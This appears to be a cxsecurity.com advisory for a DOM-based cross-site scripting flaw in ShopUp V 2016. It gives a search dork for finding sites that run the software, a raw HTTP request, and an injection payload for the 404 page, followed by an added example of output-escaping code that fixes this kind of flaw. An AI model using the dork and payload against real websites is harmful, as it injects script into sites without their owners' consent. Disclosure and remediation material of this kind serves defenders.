ShopUp V 2016 - DOM-based cross site scripting

2019.01.08
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Exploit title :
Exploit author : Heisenberg
software link : http://www.shopup.com
version : *
dork : intext:"Engine by Shopup.com"
Tested on : Win7_64

GET /404.html[%Inject_Here%] HTTP/1.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

>Source : window.location
>Location : http://target/404.html
>Exploit : target/404.html[%Inject_Here%]
>Use Payload/Injection : ?wvstest=javascript:domxssExecutionSink(1,"%27%5C"><xsstag><marquee><h>to my M7 and others F you are my stars it's great honor being with you wish you the best</h></marquee>)

References:

Salvatrucha
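
Added example, not part of the original advisory and not ShopUp's code: the advisory names window.location as the source on 404.html but does not show the sink, so this sketch assumes the page echoes the requested address back into its markup. It contrasts that pattern with a version that decodes and then HTML-escapes the value; the function names and the sample URL are constructed for illustration.

```javascript
// Assumed pattern (hypothetical): the 404 page concatenates the location
// string into markup, so any markup in the URL becomes part of the DOM.
function buildNotFoundUnsafe(href) {
  return '<p>Page not found: ' + href + '</p>';
}

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
};

// Encode the five characters that can change HTML parsing context.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hardened form: decode for display first, then escape. Escaping must be the
// last step, because decoding after escaping would bring "<" and ">" back.
function buildNotFoundSafe(href) {
  let shown;
  try {
    shown = decodeURI(href);
  } catch (e) {
    shown = href; // malformed percent-encoding: display the raw string
  }
  return '<p>Page not found: ' + escapeHtml(shown) + '</p>';
}

// Constructed sample inputs with a harmless marker tag.
const SAMPLE_RAW = 'http://target/404.html?x="><marquee>test</marquee>';
const SAMPLE_ENCODED = 'http://target/404.html?x=%22%3E%3Cmarquee%3Etest';

// In a browser the same result is reached without string building:
//   element.textContent = decodeURI(window.location.href);
```

Percent-encoded input matters here: a page that decodes the URL before writing it restores the raw angle brackets, which is why the escape step runs after decoding.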



Copyright 2019, cxsecurity.com

 
